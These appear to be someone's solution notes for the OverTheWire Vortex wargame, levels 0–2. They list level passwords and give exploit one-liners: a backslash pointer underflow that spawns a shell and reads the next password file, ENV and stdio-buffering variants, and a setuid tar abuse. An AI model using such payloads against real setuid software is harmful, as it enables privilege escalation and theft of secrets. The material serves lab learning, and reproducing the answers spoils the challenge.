# ssh vortexn@vortex.labs.overthewire.org

Level0:
------------------------------------------------
L0.py 
Username: vortex1 Password: Gq#qu3bF3

Level 1:
------------------------------------------------
- '\\' advances back the pointer

python -c 'print "\\"*257 + "\xca" + "A"' | ./vortex1
sh-4.1# exit

Method 1)
How bash handles EOF..
http://byteninja.blogspot.ro/2011/09/overthewireorg-vortex-level1.html

- create a file with the following contents:
vi /tmp/cmd2
cat /etc/vortex_pass/vortex2

vortex1@melissa:/vortex$ python -c 'print "\\"*257 + "\xca" + "A"' | env ENV=/tmp/cmd2 /vortex/vortex1
23anbT\rE

Method 2)
http://www.pixelbeat.org/programming/stdio_buffering/
python -c 'print  "\\"*0x101+"\xcaA\n"+"A"*4000+"\nwhoami\ncat /etc/vortex_pass/vortex2"' |/vortex/vortex1

Username: vortex2 Password: 23anbT\rE

Level 2:
------------------------------------------------
vortex2@melissa:/etc/vortex_pass$ /vortex/vortex2 vortex3 vortex3 vortex3
/bin/tar: U\211\345WVS\350Z: Cannot stat: No such file or directory
/bin/tar: Exiting with failure status due to previous errors

vortex2@melissa:/etc/vortex_pass$ ls -alh '/tmp/ownership.$$.tar'
-rw-r--r-- 1 vortex3 vortex2 10K 2012-09-06 23:19 /tmp/ownership.$$.tar

Method 1) 
Untar and output to STDOUT :
tar xf '/tmp/ownership.$$.tar' -O
64ncXTvx#

Method 2)
Test with scp in verbose mode. $$ is interpreted so it should be correctly escaped. 
scp -v vortex2@vortex.labs.overthewire.org:'test$$' .
...

Copy archive locally:
scp vortex2@vortex.labs.overthewire.org:'/tmp/ownership.\$\$.tar' .

Username: vortex3 Password: 64ncXTvx#

Level 3:
------------------------------------------------
